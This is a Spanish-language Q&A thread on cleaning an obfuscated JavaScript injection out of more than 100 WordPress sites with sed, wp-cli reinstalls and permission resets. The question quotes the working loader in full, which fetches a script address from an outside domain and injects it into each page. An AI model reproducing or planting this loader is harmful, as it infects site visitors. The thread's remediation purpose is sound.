# Eliminar virus en wordpress con SED en un vps con linux

Tags: php, wordpress, regex, búsquedas, sed

tengo un vps con mas de 100 instalaciones de wordpress y todos ellos tienen un script en su cabecera o header.php

```
var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}
```

Intenté eliminarlo con `sed` con este comando:

```
find . -name "*.php" -exec sed -i '/var _0xfcc4.*{a\(\)}}/d' '{}' \;
```

o bien:

```
find . -name "*.php" -exec sed -i '/var _0xfcc4/d' '{}' \;
```

pero me elimina la etiqueta `<head>`:

Antes:

[image: introducir la descripción de la imagen aquí]

Y después:

[image: introducir la descripción de la imagen aquí]

Comment: Mira [ask] <-ACA para que tu pregunta sea mejor recibida. Tambien, aprovecha    y haz el [tour] <-ACA para entender mejor como funcionamos y de paso obtener tu primera [medalla](https://es.stackoverflow.com/help/badges)! Que quiere decir no me funciono??

Comment: ¿Por qué no dices directamente `sed '/^var _0x/d'`? No necesitas usar `.*` ni nada de esto, pues esto revisará las líneas que empiezan por "var _0x" y las eliminará. Si sabes que siempre está en la misma línea, puedes indicarlo también a sed. A todo esto, ¿por qué `-exec sed .... '{}' \;`? Creo que `{}` va sin comillas alrededor.

Comment: lo hice asi, pero me elimina la etiqueta head, es decir me elimina <head>, no se por que.

Comment: si ejecuto find . -name "*.php" -exec sed -i '/var _0xfcc4/d' '{}' \; me elimina la etiqueta <head>

Comment: Aqui envio un antes y despues de este comando
find . -name "*.php" -exec sed -i '/var _0xfcc4/d' '{}' \; 

Antes:  https://ibb.co/gMONK9
Despues: https://ibb.co/f04jXU

Answer (score 2):

Tienes un problema grande pienso.
Para empezar: eliminando esos scripts puede que la página quede inservible.

Yo comenzaría por hacer estas acciones:
1) IMPORTANTISIMO: backup de todos los sitios (del FTP y de la BBDD).

2) Desactivaría todos los plugins del sitio desde el admin de wordpress y luego desactivaría el sitio desde el panel de hosting para que no esté disponible por internet.

3) Eliminaría las carpetas wp-admin y wp-includes y todo lo que halla en ese nivel excepto wp-config.php y .htaccess. 
(Es decir, solo dejaría .htaccess y wp-config.php y la carpeta wp-content).

4) Eliminaría (apuntando antes los nombres), las carpetas de plugins que están en wp-content/plugins

5) Subiría las carpetas de los plugins por ftp. 
Esto es: primero descargarte el zip de los plugins, lo descomprimes y la carpeta con el nombre del plugin la subes a wp-content/plugins

6) buscar cualquier archivo .php residente en uploads (En uploads no tiene que haber nada *.php) como mucho el index.php con el echo de "Silent is gold".

7) Descomprimiría un wordpress **de la misma versión del que tuvieras instalado** y subiría todo el contenido, sobreescribiendo wp-content cuando te lo pida. Esto es necesario para asegurarte que la instalación está limpia.

8) En el fichero wp-config.php agregaría estás dos lineas al final:

```
define('FS_CHMOD_FILE', 0644);
define('FS_CHMOD_DIR', 0755);
```

9) Activa el sitio, logueate y activa los plugins.

Esto no es el remedio total, pero por lo menos podrás resolver el problema del script pienso. Muchísima suerte
(No te olvides del backup del FTP y la BBDD primero de todo)

Comment: Hola amigo, gracias por responder. Son muchísimos wordpress, es decir, tardaría mucho en realizar eso para cada instalación de wordpress. Tengo respaldo, por eso pruebo soluciones con confianza.
Ahora revisando los archivos de los wordpress y los temas conseguí un patrón para todo los archivos, es decir, el script esta en todo los archivos que contengan la etiqueta <head> y los permisos están modificados en 777, por ejemplo el archivo wp-login.php, en los temas todos los archivos header.php, etc. Estaba buscando solución con sed, que busque los .php y elimine ese codigo en cada <head>

Answer (score 2):

El problema reside en la expresión de Sed que usas: al decir `sed '/búsqueda/d'` estás eliminando todas las líneas que contienen "búsqueda".

Lo que seguramente necesitas es `sed 's/búsqueda//'`, que sustituirá "búsqueda" por la nada, eliminándolo.

Mira un ejemplo:

```
$ cat fichero
hola
que tal estas
hola var bu ba
var va2
$ sed '/var/d' fichero
hola
que tal estas
ea
$ sed 's/var.*//' fichero
hola
que tal estas
hola
```

En tu caso:

```
find . -name "*.php" -exec sed -i.bak 's/var _0xfcc4.*{a\(\)}}//' '{}' \;
```

Fíjate además que al hacer `sed -i '...'` estás sobreescribiendo el fichero. Esto es peligroso, pues si no hace lo que quieres pierdes el original. De allí que ponga `sed -i.bak` para que guarde un fichero de backup.

Answer (score 1):

No se si ya lo has resuelto, supongo que a estas alturas seguro que sí. Yo como medida rápida lo que hice es, en vez de eliminar el bloque entero, lo que hice fue comentar la variable. Con eso ya se solucionaba rápidamente, luego fue cuestión de machacar todos esos ficheros js por el original.

```
find . -type f -name "*.js" -exec sed -i 's/var _0xfcc4=/\/\/var _0xfcc4=/g' {} +
```

Esa fue la solución más rápida para aplicar como primera medida con ciertas garantías de no romper nada, ya que solo comentaba esa línea "infectada".

Comment: Lo único es que en ocasiones rompe los ficheros, sobre todo los js que están minificados. Hay que tenerlo en cuenta.

Comment: la primera vez que lo intente me daño algunos js por que eliminaba unos cuantos caracteres al fina de la cadena, pero luego con el respaldo pude restablecer, luego busque un patron en todos los js y php y logre aplicar el sed para los php y js sin que me los dañara, aunque por si las dudas reemplace todos los archivos del core de wordpress con una instalación limpia, solo me faltaria seguir revisando el contenido de wp-content.

Answer (score 1):

Ademas de limpiar los .php te sugiero utilizar [wp-cli](https://wp-cli.org/es/) para forzar la reinstalación/update del core, themes y plugins de cada wordpress.

La secuencia sería :

```
# cambiar a carpeta donde está el wp-config.php
cd /carpeta/del/wordpress 

# descargar e instalar la última versión de wordpress
# (cachea la primera descarga la usa para todas las demás)
wp core download --force

# descargar e instalar la última versión de los plugins
# (cachea la primera descarga la usa para todas las demás)
wp plugin install $(wp plugin list --field=name) --force

# descargar e instalar la última versión de los themes
# (cachea la primera descarga la usa para todas las demás)
wp theme install $(wp theme list --field=name) --force
```

- repetir para las otras N instalaciones

Reestablecer owners, groups y permisos (aquí varía según el OS y como tengas los users de apache/nginx/php)

```
# cambiar a carpeta donde está el wp-config.php
cd /carpeta/del/wordpress 

# owner y group www-data ajustar según OS y webserver
sudo chown www-data: /carpeta/del/wordpress -R 

# variantes según tu esquema de seguridad 664, 644, 640 
sudo find . -type f -exec chmod 664 {} \; // ajustar a tus users y grupos

# variantes según tu esquema de seguridad 775, 755, 750 
sudo find . -type d -exec chmod 775 {} \; // ajustar a tus users y grupos

# sticky bit para que nuevos archivos hereden el grupo de la carpeta donde se crean
sudo find . -type d -exec chmod g+s {} \;
```

caso especial es `wp-config.php` que debería ser mas estricto onda 440 ó 400

Comment: esta genial esto wp-cli no lo sabia, gracias amigo, de verdad disculpen mi ignorancia, logre solucionar y gracias a todos por responder.

Comment: la ventaja de wp-cli es que si los themes son estándar y no están modificados, te los limpia de una, luego quedará limpiar los child-theme pero eso ya es siempre menos cantidad